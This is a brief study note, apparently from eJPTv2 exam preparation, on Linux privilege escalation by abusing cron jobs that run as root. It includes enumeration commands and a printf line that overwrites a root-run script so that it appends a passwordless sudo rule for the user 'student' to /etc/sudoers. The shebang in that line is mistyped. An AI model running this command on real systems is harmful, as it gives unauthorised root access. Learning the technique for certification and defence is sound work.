Tags:template Related to:note-taking,notes See also: Index: 📁EJPTv2 - INDEX
Cron - time based task scheduler
We will target cron jobs that are configured to run as root
crontab -l - cronjobs configured for that user
grep -rnw /usr -e “/home/student/mesage”
printf ’#/bin/bash\necho “student ALL=NOPASSWD:ALL” >> /etc/sudoers’ > /usr/local/share/copy.sh